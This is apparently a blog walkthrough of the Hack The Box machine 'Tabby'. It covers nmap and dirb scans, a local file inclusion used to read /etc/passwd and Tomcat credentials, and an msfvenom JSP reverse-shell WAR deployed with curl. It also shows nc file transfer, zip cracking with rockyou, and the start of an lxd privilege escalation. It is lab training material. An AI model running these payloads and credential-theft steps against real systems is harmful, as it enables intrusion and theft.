Lets start with an NMAP scan
Copy root@liberty:~# nmap -A tabby.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-27 10:04 EDT
Nmap scan report for tabby.htb (10.129.28.106)
Host is up (0.015s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=10/27%OT=22%CT=1%CU=39779%PV=Y%DS=2%DC=T%G=Y%TM=5F9829
OS:05%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Lets enumerate 80 & 8080 with Dirb:
Copy root@liberty:~# dirb http://tabby.htb:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 27 10:06:36 2020
URL_BASE: http://tabby.htb:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://tabby.htb:8080/ ----
+ http://tabby.htb:8080/docs (CODE:302|SIZE:0)
+ http://tabby.htb:8080/examples (CODE:302|SIZE:0)
+ http://tabby.htb:8080/host-manager (CODE:302|SIZE:0)
+ http://tabby.htb:8080/index.html (CODE:200|SIZE:1895)
+ http://tabby.htb:8080/manager (CODE:302|SIZE:0)
-----------------
END_TIME: Tue Oct 27 10:07:52 2020
DOWNLOADED: 4612 - FOUND: 5
Copy root@liberty:~# dirb http://tabby.htb
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 27 10:06:01 2020
URL_BASE: http://tabby.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://tabby.htb/ ----
==> DIRECTORY: http://tabby.htb/assets/
+ http://tabby.htb/favicon.ico (CODE:200|SIZE:766)
==> DIRECTORY: http://tabby.htb/files/
+ http://tabby.htb/index.php (CODE:200|SIZE:14175)
+ http://tabby.htb/server-status (CODE:403|SIZE:274)
---- Entering directory: http://tabby.htb/assets/ ----
==> DIRECTORY: http://tabby.htb/assets/css/
==> DIRECTORY: http://tabby.htb/assets/fonts/
==> DIRECTORY: http://tabby.htb/assets/images/
==> DIRECTORY: http://tabby.htb/assets/js/
---- Entering directory: http://tabby.htb/files/ ----
==> DIRECTORY: http://tabby.htb/files/archive/ While poking around through the results I also wanted to test the sites for LFI or RFI vulnerabilities. While clicking each link in the site we noticed the news site redirected to megahosting.htb/news.php?file=statement. This file= looking like it could be a LFI. Lets take a look at /etc/hosts and /etc/passwd
With this access we should go after the Tomcat web-server config. After some serious Googling we find that the location of the tomcat creds is usr/share/tomcat9/etc/tomcat-users.xml. When originally loading the page I was convinced the LFI wasn't working. ALWAYS VIEW THE SOURCE.
These creds get us in but I don't see anywhere to upload a WAR. Java web applications are usually packaged as WAR files for deployment. ... These files can be created on the command line or with an IDE like Eclipse. After deploying our WAR file , Tomcat unpacks it and stores all project files in the webapps directory in a new directory named after the project.
We can find the syntax for generating this type of payload under my cheetsheets section:
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war After creating our WAR reverse_shell we can deploy it with curl
Copy curl -u ‘tomcat’:’$3cureP4s5w0rd123!’ -T shell.war ‘http://tabby.htb:8080/manager/text/deploy?path=/shell' After uploading the shell lets start our listener and navigate to the page
After enumerating the box we find a backup zip. Let's take a took at that locally. To do this I will use nc to down download the zip.
Tabby
Copy nc -w 4 $IP $PORT < 16162020_backup.zip Kali
Copy :/home/tabby# nc -nlvp 443 > backup.zip
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.28.106.
Ncat: Connection from 10.129.28.106:54898.
root@liberty:/home/tabby# ls
backup.zip shell.war
root@liberty:/home/tabby# The zip turned out to be encrypted so I used fcrackzip and the rockyou wordlist and got a hit!
Copy root@liberty:/home/tabby# fcrackzip -D -p /usr/share/wordlists/rockyou.txt backup.zip
possible pw found: admin@it ()
root@liberty:/home/tabby# Lets try to get access to the user.txt file with these creds:
Copy tomcat@tabby:/var/www/html/files$ su ash
Password: admin@it
ash@tabby:/var/www/html/files$ cat /home/ash/users.txt
FLAG HERE Privilege Escalation:
Lets
After reviewing the groups Ash is a member of I came across this article:
The article summarizes the priv esc as follows:
In order to take escalate the root privilege of the host machine you have to create an image for lxd thus you need to perform the following the action:
Steps to be performed on the attacker machine :
Download build-alpine in your local machine through the git repository.
Execute the script “build -alpine” that will build the latest Alpine image as a compressed file, this step must be executed by the root user.
Transfer the tar file to the host machine
Steps to be performed on the host machine:
Download the alpine image
Initialize the image inside a new container.
Mount the container inside the /root directory
After reading the article above the tool would not build after a couple of Google searches I found this article:
I needed to add the -a i686 to my build command:
Copy root@liberty:~/htb/lxd-alpine-builder# ./build-alpine -a i686
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86
Downloading alpine-keys-2.2-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.10.5-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading alpine-mirrors-3.5.10-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
Selecting mirror http://alpine.mirror.far.fi/v3.12/main
fetch http://alpine.mirror.far.fi/v3.12/main/x86/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r9)
(2/19) Installing busybox (1.31.1-r19)
Executing busybox-1.31.1-r19.post-install
(3/19) Installing alpine-baselayout (3.2.0-r7)
Executing alpine-baselayout-3.2.0-r7.pre-install
Executing alpine-baselayout-3.2.0-r7.post-install
(4/19) Installing openrc (0.42.1-r11)
Executing openrc-0.42.1-r11.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-bundle (20191127-r4)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r19)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r19)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r9)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.1-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
root@liberty:~/htb/lxd-alpine-builder# 
